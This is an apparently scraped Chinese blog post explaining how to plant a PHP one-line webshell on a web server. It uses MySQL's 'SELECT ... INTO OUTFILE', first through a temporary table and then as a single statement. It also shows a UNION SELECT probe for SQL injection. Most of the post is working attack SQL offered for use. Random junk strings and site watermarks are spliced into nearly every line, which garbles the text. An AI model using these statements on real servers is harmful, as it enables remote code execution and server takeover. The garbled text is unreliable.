浅谈MySQL导出一句话木马拿WebShell的方法

昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。

9vbHE$d:Z#{1fJL0文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行)：IXPUB技术博客S9_9bNNi};C7l

DropTABLEIFEXISTStemp;//如果存在temp就删掉IXPUB技术博客6u6Hw.\R\u

CreateTABLEtemp(cmdtextNOTNULL);//建立temp表，里面就一个cmd字段

1G_Dc`4X"BE0InsertINTOtemp(cmd)VALUES('<?phpeval($_POST[cmd]);?>');//把一句话木马插入到temp表

-l*h1sb@a9j7L7m$n0Selectcmdfromtempintooutfile'F:/wwwroot/eval.php';//查询temp表中的一句话并把结果导入到eval.php

r'`zYc!vpko?u0DropTABLEIFEXISTStemp;//删除temp(擦屁股o(∩_∩)o...)IXPUB技术博客yoc3p/rk

这几句SQL很简单，我做了简单的注释。IXPUB技术博客br5q|:Nk\@

不过想想我们在测试PHP的SQL漏洞的时候经常用如下的语句：

9NW$fO.\+]#N0/**/UNIONSELECT1,2,3,4,5,6,7,8,9,10,11,12/*IXPUB技术博客Fp5c/Psc

然后返回的页面中可能会出现1~12之间的数字。这里加入数字3显示出来了。

\8r7}:}0如果我们把上面这句改成/**/UNIONSELECT1,2,'zerosoul',4,5,6,7,8,9,10,11,12/*，则返回页面上次显示3的地方会显示zerosoul。IXPUB技术博客,MKor#|G

也就是说如果我们的select语句后面不带fromtable语句的话，我们说查询的数字或字符会直接返回到查询结果里。

M8a@pZ,I!F6eAg0既然这样，我们为何还要那么麻烦去建一个表，先导入数据，再导出这样折腾呢。

W5Dh_5p!e-A(t:Ez0有了这个思路，上面那一大段到出一句话的SQL代码可以直接简化到一句:IXPUB技术博客x1L`D([G

Select'<?phpeval($_POST[cmd]);?>'intooutfile'F:/wwwroot/eval.php';IXPUB技术博客5JZ'~n+iJ:Wvj

这样做不但简单明了，而且避免了误删别人的数据。

Agi/t\8]SYWD0

A"G3n)f;f$Q1h(Q6Y0

.}!D7Uzu7p0

$R.Sy!pT_j_*_0